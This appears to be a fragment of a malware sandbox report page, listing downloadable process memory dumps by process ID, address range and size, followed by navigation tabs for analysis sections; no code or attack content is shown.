
Download
memory/1044-165-0x00000000044E0000-0x00000000045E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-72-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-73-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-75-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1560-95-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/1560-94-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/1560-93-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/1560-92-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/1560-91-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads